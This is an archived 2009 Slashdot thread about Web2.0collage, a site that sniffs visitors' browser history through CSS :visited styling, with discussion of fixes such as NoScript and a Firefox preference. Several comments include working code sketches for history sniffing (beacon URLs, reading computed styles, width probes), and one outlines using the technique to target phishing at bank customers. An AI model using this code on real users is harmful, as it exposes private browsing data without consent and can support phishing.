Your Browser History Is Showing

tiffanydanica writes "For a lot of us, our browser history is something we consider private, or at least not something we want to expose to every website we visit. Web2.0collage is showing just how easy it is (with code!) for sites to determine what sites you visit. When you visit the site, it sniffs your browser history and creates a collage of the (safe for work) sites that you visit. It is an interesting application of potentially scary technology (imagine a job application site using this to screen candidates). You can jump right into having your history sniffed if you so desire. While the collages are cool on their own merit, they also serve as an illustration of the privacy implications of browser history sniffing."


This discussion has been archived. No new comments can be posted.

  • by account_deleted ( 4530225 ) on Thursday July 02, 2009 @10:05AM (#28557159)
    Comment removed based on user account deletion
  • So just disable your browser history if you are that paranoid about it. It only takes a few clicks in any major browser. Plus, if for some reason you don't want to do that, most browsers now have a private mode that doesn't record those sites in the history.
    • Re:...So.... (Score:5, Insightful)

      by MyLongNickName ( 822545 ) on Thursday July 02, 2009 @10:21AM (#28557397) Journal

      So, the choice is:

      1. Allow everyone in the world to sniff my browsing history.
      2. Give up the ability to see my own browsing history.

      Somehow, this doesn't seem right...

    • Re:...So.... (Score:4, Insightful)

      by causality ( 777677 ) on Thursday July 02, 2009 @10:21AM (#28557399)

      So just disable your browser history if you are that paranoid about it. It only takes a few clicks in any major browser. Plus, if for some reason you don't want to do that, most browsers now have a private mode that doesn't record those sites in the history.

      I think the point can be explained this way: "who's the numbnuts who thought it would be a great idea to make this information available to anyone who asks for it?" Speaking generally about all user data and all remote IP addresses, all remote hosts are on a need-to-know basis and 99.999% of the time, they don't need to know. They particularly don't need to know without prompting the user and asking "do you want to give out this information?" with that question defaulting to "No" and a box, checked by default, which says "Remember this preference".

      You can subtly dismiss it as paranoia if you like. That doesn't excuse poor design. Also, globally disabling the browser history would deny the remote Web site access to the browser's history, sure, but it would also deprive the user of this local feature. There should be a more reasonable alternative to either "lose this feature" or "make this feature available to anyone who asks with no regard for privacy." Apparently NoScript provides such an alternative.

      • by Qzukk ( 229616 )

        who's the numbnuts who thought it would be a great idea to make this information available to anyone who asks for it?

        Changing the color of a link you've visited has been around forever. Changing the style of a link you've visited to one that can send information back to the server eg "background-image:url(/visited.pl?site=slashdot)", that's newer.
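
        A minimal sketch of how such a rule can be wired up (the /visited.pl path is from the example above; the ids and the list of probed sites are invented for illustration):

          <style>
            /* One rule per site to probe. The browser only requests the background
               image if it treats the link as visited, so every hit on /visited.pl
               is a beacon saying "this site is in the visitor's history". */
            #chk-slashdot:visited { background-image: url(/visited.pl?site=slashdot); }
            #chk-digg:visited     { background-image: url(/visited.pl?site=digg); }
          </style>
          <!-- The probe links never need to be seen, just rendered. -->
          <div style="position:absolute; left:-9999px">
            <a id="chk-slashdot" href="http://slashdot.org/">&nbsp;</a>
            <a id="chk-digg" href="http://digg.com/">&nbsp;</a>
          </div>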

        • who's the numbnuts who thought it would be a great idea to make this information available to anyone who asks for it?

          Changing the color of a link you've visited has been around forever. Changing the style of a link you've visited to one that can send information back to the server eg "background-image:url(/visited.pl?site=slashdot)", that's newer.

          Sorry but I don't think I fully understand how that relates to this story. Would you elaborate please? What you describe there sounds like a re-implementation of so-called "http ping."

          • Re:...So.... (Score:5, Informative)

            by uglyduckling ( 103926 ) on Thursday July 02, 2009 @10:41AM (#28557681) Homepage
            Because that's how this vulnerability works. It doesn't really sniff your browser history as such; what it does is put up a huge page full of popular websites, display them as (invisible) links, and see which links change colour. There's no easy workaround that will both allow you to have a history, and allow web pages to display something different (e.g. link colour / style) for pages that you have visited already. Perhaps the best compromise would be to allow changes to link style only within the domain of the page that's attempting to set that style. But it's still a major backward step in usability. The other option might be to disable link styles for pages that have greater than a certain number of links (say 50).
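
            A rough sketch of the script side of that check (the site list, the colour value, and the assumed "a:visited { color: #f00 }" stylesheet rule are invented for illustration; it relies on getComputedStyle reporting the :visited colour back, which current browsers do):

              var sites = ["http://slashdot.org/", "http://digg.com/", "http://reddit.com/"];
              var visited = [];
              for (var i = 0; i < sites.length; i++) {
                var a = document.createElement("a");
                a.href = sites[i];
                a.style.display = "none";              // probe links never have to be visible
                document.body.appendChild(a);
                // If the page's CSS gives :visited links a distinctive colour, reading the
                // computed style back reveals whether the URL is in the browser history.
                var colour = window.getComputedStyle(a, null).getPropertyValue("color");
                if (colour === "rgb(255, 0, 0)") {     // the colour the :visited rule sets
                  visited.push(sites[i]);
                }
                document.body.removeChild(a);
              }
              // "visited" can now be reported home with an ordinary request.
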
            • Re: (Score:3, Insightful)

              by Anonymous Coward

              There's no easy workaround that will both allow you to have a history, and allow web pages to display something different (e.g. link colour / style) for pages that you have visited already.

              Sure there is. Have your browser always pull the visited and unvisited styles, then just display the relevant one. Problem solved.

              • That would make it harder, but not impossible. If you have a background image for each link style, and give that background image a unique (one-time generated) name, then the server would know when that image had been pulled, and hence which links had been visited.
                • Ooooh, I just re-read your post and see what you mean. Sorry. I still think there could be ways of doing it though, like making the images different sizes and then seeing what size the containing object has become - in fact this would work by using fonts of different sizes. I think once you start trying to prevent this, you pull on one little thread and the whole CSS/DOM thing unravels.
            • Of course there is. The easy workaround is to automatically load all of the link background images. Then the server can't sniff anything.

            • Re: (Score:3, Insightful)

              by AtomicJake ( 795218 )

              Because that's how this vulnerability works. It doesn't really sniff your browser history as such; what it does is put up a huge page full of popular websites, display them as (invisible) links, and see which links change colour. There's no easy workaround that will both allow you to have a history, and allow web pages to display something different (e.g. link colour / style) for pages that you have visited already.

              The Web page (HTML, Javascript code, ...) should not be able to detect such differences and report them back home; it's OK to tell the browser how to render visited links, but not to get feedback from the browser on how it rendered which links. That feedback is what actually breaks the sandbox principle.

              I actually think that the current direction toward "the browser is the OS" (or even worse, "the Flash player in your browser is the OS") is a security nightmare.

              • I think there would always be a way round this. I suspect there would be a clever computational way of benchmarking the rendering engine and then creating images of different sizes on-the-fly in a complex layout and finding out which combinations were rendered. Sounds complex, but with a little thought I think there will always be a workaround.
              • The Web page (HTML, Javascript code, ...) should not be able to detect such differences and report them back home; it's OK to tell the browser how to render visited links, but not to get feedback from the browser on how it rendered which links.

                So say I make my :visited links twice as tall as my regular links. Are you saying JavaScript shouldn't be able to read the height of the element? That would break all scripts that position anything. Once I can read it with JavaScript, I can always send it back home (e.g., via AJAX, add an image or iframe with a magic URL the browser will load, . . .).

                The only way I see to fix this would be to sharply limit the properties that can be set based on :visited, to things like color and background-image; fetch background images for :visited links even if they aren't visited and the image won't be used; and lie to script when it asks about the color of a visited link (by pretending it's not visited in all cases). You can't even allow things like font-weight to be set: anything that affects sizes is going to be impossible to hide from script.

                • The Web page (HTML, Javascript code, ...) should not be able to detect such differences and report them back home; it's OK to tell the browser how to render visited links, but not to get feedback from the browser on how it rendered which links.

                  So say I make my :visited links twice as tall as my regular links. Are you saying JavaScript shouldn't be able to read the height of the element? That would break all scripts that position anything. Once I can read it with JavaScript, I can always send it back home (e.g., via AJAX, add an image or iframe with a magic URL the browser will load, . . .).

                  You are completely right.

                  The only way I see to fix this would be to sharply limit the properties that can be set based on :visited, to things like color and background-image; fetch background images for :visited links even if they aren't visited and the image won't be used; and lie to script when it asks about the color of a visited link (by pretending it's not visited in all cases). You can't even allow things like font-weight to be set: anything that affects sizes is going to be impossible to hide from script.

                  Good idea making :visited very restricted.

                  Or you could, you know, not worry that random sites can figure out that omg you visit Slashdot (very inefficiently, by the way). That's the tactic I'm taking, personally.

                  Here, I do not agree at all. This is a privacy issue, and a privacy issue can very quickly become a security issue (phishing). And even if it is not phishing, I do not want /. or any other page to find out what I looked at before. Of course, for tracking sites this is a very cool possibility to get more information about you (and to earn more dollars with that information). Your tactic may work for you, but for most users it's a privacy nightmare. And you don't need to be paranoiac ...

                  • Here, I do not agree at all. This is a privacy issue, and a privacy issue can very quickly become a security issue (phishing). And even if it is not phishing, I do not want /. or any other page to find out what I looked at before. Of course, for tracking sites this is a very cool possibility to get more information about you (and to earn more dollars with that information). Your tactic may work for you, but for most users it's a privacy nightmare. And you don't need to be paranoiac ...

                    I strongly suspect that most users don't really care that much. And I don't think it's very worrisome even if you're concerned about privacy. The concept has been public for eight years now, but there's not a single attack that's ever been identified in the wild, nor is there any indication that one is likely anytime soon.

                    It's a complicated and slow technique that gets you very little useful information. Phishers could (and do) more profitably spend their time trying to get more people to visit thei

            • by ceoyoyo ( 59147 )

              "There's no easy workaround that will both allow you to have a history, and allow web pages to display something different (e.g. link colour / style) for pages that you have visited already."

              Wait a minute, you could just make it work like it's SUPPOSED to. The page says "hey, can you make any visited links a different colour?" and my browser, if I say so, displays those links to me in a different colour.

              If for some reason the web server wants to know what's happening on my end (say, it wants to do some web

          • Re:...So.... (Score:4, Informative)

            by vidarh ( 309115 ) <vidar@hokstad.com> on Thursday July 02, 2009 @10:47AM (#28557761) Homepage Journal
            Whether or not you can *read* the history of a browser is irrelevant if you want to know whether or not a user has visited a specific site. In that case you can simply create a page that sets appropriate CSS rules to make the browser try to load a specific background image for visited URLs, for each site you want to check for. Then when the user loads your page, you'll get a barrage of what you call http pings, and all you need to do is collate that information and you know which of the sites you care about the user has visited recently.

            It's less invasive than being able to wholesale dump the browser history (you don't know when the sites were visited, for example), but protecting against it also means disabling functionality: you'd need to prevent an app from being able to tell whether or not a link on its own page has been clicked via CSS rules or other means, which means either disabling the distinction between visited and unvisited completely, or disabling reading back style information and/or preventing CSS rules that trigger loading of external resources.
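
            To make the mechanics concrete, here is roughly how a page could generate one such rule per site it wants to check; the /ping endpoint, the ids, and the site list are hypothetical:

              var targets = { "slashdot": "http://slashdot.org/", "digg": "http://digg.com/" };
              var css = "", html = "";
              for (var key in targets) {
                // Each probed site gets its own :visited rule pointing at a unique beacon URL...
                css += "#chk-" + key + ":visited { background-image: url(/ping?site=" + key + "); }\n";
                // ...and an off-screen link for that rule to match.
                html += '<a id="chk-' + key + '" href="' + targets[key] + '">&nbsp;</a> ';
              }
              var style = document.createElement("style");
              style.appendChild(document.createTextNode(css));
              document.getElementsByTagName("head")[0].appendChild(style);
              var holder = document.createElement("div");
              holder.style.position = "absolute";
              holder.style.left = "-9999px";
              holder.innerHTML = html;
              document.body.appendChild(holder);
              // The server then only has to tally which /ping?site=... URLs show up in its access log.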

  • black image (Score:5, Funny)

    by Red Flayer ( 890720 ) on Thursday July 02, 2009 @10:07AM (#28557191) Journal
    I tried it.

    I got a black screen (apparently no history to be shown).

    Either the engine is borked, or my privacy add-ins are working properly...

    Or possibly the Oracle of Browser History has determined that my history is darker than the darkest dark, and refused to show images.
  • Not mine (Score:5, Informative)

    by Monoman ( 8745 ) on Thursday July 02, 2009 @10:08AM (#28557213) Homepage

    No Script baby

    • No Script baby

      I second that emotion. I never browse at work without it.

    • Re: (Score:1, Redundant)

      by Yaa 101 ( 664725 )

      It is unbelievable how many sites try to cram your surfing session with all sorts of cross-site scripting and other nuisances from 3rd parties.

      NoScript essentially gives the decision about running scripts back to the owner of the web client.

    • Re: (Score:1, Insightful)

      by Anonymous Coward

      It can also be done using CSS and then grepping the access log. NoScript will not help you there.

      • It can also be done using CSS and then grepping the access log. NoScript will not help you there.

        That could be easily circumvented if browsers just fetched the image unconditionally for :visited. The script methods are impossible to stop without locking down what properties are valid to use for :visited.

    • Re:Not mine (Score:5, Informative)

      by gazbo ( 517111 ) on Thursday July 02, 2009 @10:38AM (#28557641)
      No Script may help in this case, but not in general. There was a story here only a couple of weeks back talking about a pure CSS method for doing exactly this.
      • Well, then I'll install a NoCSS add-on. Who needs layout anyway.

  • Being able to query whether or not I visit common sites is a far cry from my browser history being shown, but still this needs to be fixed.

    How long until a politician gets busted for visiting a child pornography website?
    • In regard to your sig, and only your sig: the mayor of my hometown has already been busted for child pornography/child enticement. Here's one of many articles. [jsonline.com]
  • And all it showed was pictures of raptors and deadbolts.
  • by Anonymous Coward on Thursday July 02, 2009 @10:09AM (#28557231)

    This methodology is actually quite old. It takes advantage of the CSS a:visited selector. Imagine making a:visited have a width of 5 and A have a width of 100. Drop another element right next to it and then, after the page loads, check the location of that second element. Even if the browser attempts to block JS from accessing the style applied to the visited link, it can't keep you from accessing everything else on the page. Voila, by injecting a lot of links onto the page, you can find out where a person has been.

    This is particularly dangerous because it can make Phishing very powerful. Imagine creating a resource that collects email addresses, but on that same page running this script to check the login pages of major banks. Then, you can send out targeted emails to people who you know have bank accounts at particular providers.
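
    A rough sketch of that width trick (the class name, the 50px threshold, and the /log beacon URL are invented for illustration). Note that it never reads the probe link's own style, only where an innocent neighbouring element ends up:

      <style>
        a.probe         { display: inline-block; width: 100px; }
        a.probe:visited { width: 5px; }
      </style>
      <a class="probe" href="http://slashdot.org/">&nbsp;</a><span id="marker">&nbsp;</span>
      <script>
        // The marker sits immediately to the right of the probe link, so its
        // horizontal position depends on which width rule the browser applied.
        var x = document.getElementById("marker").offsetLeft;
        var wasVisited = (x < 50);   // narrow link => the :visited rule matched
        // Report the result home with an ordinary image request.
        new Image().src = "/log?slashdot=" + (wasVisited ? 1 : 0);
      </script>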

  • I went to the sniffing page linked from the summary and it stayed on 0% for 5 minutes so I guess it does not work for me.

    NoScript (I presume) saves the day again!
    • Eh, noscript has become adware in the last year. The reason it keeps updating itself is for ads and to make sure you aren't blocking its own ads, and not for actual updates.

      • by swb ( 14022 )

        Are you sure about that?

        It seems to work fine and I don't notice any additional ads, and when it does update there almost always seems to be something "new" that has been added.

      • by radtea ( 464814 ) on Thursday July 02, 2009 @10:36AM (#28557609)

        Eh, noscript has become adware in the last year.

        This is an outdated claim: http://hackademix.net/2009/05/04/dear-adblock-plus-and-noscript-users-dear-mozilla-community/ [hackademix.net] It pertains to an ugly episode for which the NoScript author is rightfully apologetic.

        It's a curious phenomenon, how the mind closes once a certain type of conclusion has been reached. This is the phenomenon that led to the NoScript/AdBlock war, and it seems entirely unfruitful to emulate exactly the kind of thinking that caused the issue in the first place.

        • Just because he apologised and changed the behaviour, that doesn't mean we're all happy-clappy about noscript again.

          Trust, once lost, takes time to be earned again.

    • by Krneki ( 1192201 )
      Same story here, it does not work.
    • I went to the sniffing page linked from the summary and it stayed on 0% for 5 minutes so I guess it does not work for me. NoScript (I presume) saves the day again!

      Well, yeah. The whole thing is JavaScript powered, so if you're not executing their JavaScript it's going to stay at 0% for a lot longer than 5 minutes ...

      This is definitely not the first time I was glad I use NoScript.

  • It's slashdotted (Score:4, Informative)

    by tepples ( 727027 ) <tepples@gm[ ].com ['ail' in gap]> on Thursday July 02, 2009 @10:11AM (#28557249) Homepage Journal
    Twice in a row, all I get is

    Expired

    This URL has expired. Please return to the home page. This is likely because of increased load. It shouldn't happen again.

  • Can we please just have something that doesn't give up our privacy every three seconds? If you like having a browser history or enjoy the benefits of javascript, you're screwed. The only answer is to disable one or both of those.

    • by Krneki ( 1192201 )
      Most of the people here are getting errors, while still enjoying the benefits of history or JavaScript.

       
  • ERROR
    The requested URL could not be retrieved

    While trying to retrieve the URL: http://web2.0collage.com/app/;((%22k%22%20.%20%22(1970%201%2079269687)%22)) [0collage.com]

    The following error was encountered:

    * Unable to forward this request at this time.

    This request could not be forwarded to the origin server or to any parent caches. The most likely cause for this error is that:

    * The cache administrator does not allow this cache to make direct connections to origin se

    • Slashdotted, most likely. According to #scheme, where the creator is hanging out, the webserver ran out of virtual memory and shat itself. It's been re-configured so it might be running better now.
  • by ugen ( 93902 ) on Thursday July 02, 2009 @10:30AM (#28557541)

    http://jeremiahgrossman.blogspot.com/2006/08/i-know-where-youve-been.html [blogspot.com]

    Of course there is no reason this still isn't fixed (by being able to disable a:visited styling).

    • Re: (Score:2, Informative)

      by maxume ( 22995 )

      Bugzilla bug 57351 was reported in October of 2000:

      https://bugzilla.mozilla.org/show_bug.cgi?id=57351 [mozilla.org]

      (Bugzilla may or may not still hate Slashdot, copy and paste if clicking the link does not work).

    • by interiot ( 50685 )

      Of course there is no reason this still isn't fixed (by being able to disable a:visited styling)

      If the issue were so simple, why has no major browser implemented a proper fix for this yet, despite the fact that we've known about the issue for nine years [mozilla.org]?

      A:visited is very useful to the user in some circumstances, so it's unacceptable to turn it off for every user in every circumstance. Firefox 3.5 added a hidden preference [squarefree.com] in case some users want to turn it on sometimes, but that solution doesn't work fo

  • wommens (Score:3, Funny)

    by psergiu ( 67614 ) on Thursday July 02, 2009 @10:33AM (#28557579)

    Quote from the final page of the script:

    You can get your web2.0collage as a mug, wommens ...

    I can have it as WHAT ? Okay, then can i have my wommens without the /. favicon all over them ?

  • Maybe it's an old story but I found this site that uses the same technique:
    http://www.schillmania.com/random/humour/web20awareness/

  • It's like a collage of my favorite porn sites.
  • I am using Firefox 3.0.11 on Ubuntu 9.04 with a T7500 CPU (Core 2 Duo 2.2 GHz).

    That site pegged one core of my CPU.

    Really? That would be damn obvious, not to mention most people would see the slow down and close the browser.

    • I am using Firefox 3.0.11 on Ubuntu 9.04 with a T7500 CPU (Core 2 Duo 2.2 GHz).

      That site pegged one core of my CPU.

      Really? That would be damn obvious, not to mention most people would see the slow down and close the browser.

      If they were also reading Slashdot then I don't know how the hell they'd notice.

      Seriously. I like Slashdot very much, but its JS is atrociously, embarrassingly slow.

  • by denominateur ( 194939 ) on Thursday July 02, 2009 @10:49AM (#28557797) Homepage

    in firefox:

      set layout.css.visited_links_enabled to FALSE in about:config

    This will break (a tiny part of) the layout of sites that use CSS to change the style of links that were visited by the user, but it protects against this problem.
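
    If you want that to stick without revisiting about:config, the same preference can go in user.js in your Firefox profile directory (a minimal sketch; the preference name is the one above, available since Firefox 3.5):

      // <profile>/user.js -- read on every startup, overriding prefs.js
      user_pref("layout.css.visited_links_enabled", false);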

  • by smackenzie ( 912024 ) on Thursday July 02, 2009 @11:19AM (#28558133)
    I see France,
    I see you shopping online at Victoria's Secret for underpants...
  • ERROR

    The requested URL could not be retrieved

    While trying to retrieve the URL: http://web2.0collage.com/app/ [0collage.com];...

    The following error was encountered:

    Unable to forward this request at this time.

    This request could not be forwarded to the origin server or to any parent caches. The most likely cause for this error is that:

    Being on slashdot!

    imagemagick bindings that leak memory

    a hard limit of 4gb in a 64bit version of mzscheme for reasons I don't know

    Your cache administrator is webmaster.

    Generat

  • use the niche browsers for your private surfing and IE/Firefox for important things

    • No. It was able to sniff my history and I'm running Safari 4.0.1 (5530.18). This has more to do with JavaScript and CSS breaking the fundamental user model of the web. It's not a problem with any particular browser, it's the web standard that is flawed. As we move toward better DOM, JavaScript and web apps, expect this kind of stuff even more.
  • by user24 ( 854467 )

    I'm stunned this is still exploitable. This bug is YEARS old.

  • Yawn... been waiting for the collage for about ten minutes so far but the progress bar seems stuck at 0%.

    I wonder if it has something to do with the unchecked "Enable JavaScript" checkbox I have displayed at the bottom of my Opera 10 window.

  • Granted, some of you are concerned about people finding out the sites you visit, but what about a real world problem (or two)?

    Some time back, there was an attack that threw up a phony dialog saying that your session had timed out at your bank's site. Combine that with being able to see *which* bank's site you use (and whether or not you have been at it recently). This could even be injected through a compromised ad-server system or the like. Maybe you don't even have to visit my site. There's some moving part

  • I want to browse "safely"; protection against most XSS and sh1t like scripts reading my browser history, etc. However, I want the sites that I visit to "work" at the same time. Ya, NoScript is great, but with sites globally disallowed, the Internets are useless.

    Can anyone offer some suggestions to reasonably lock down FF where a balance is struck between security and usability??

    TIA, --ponga
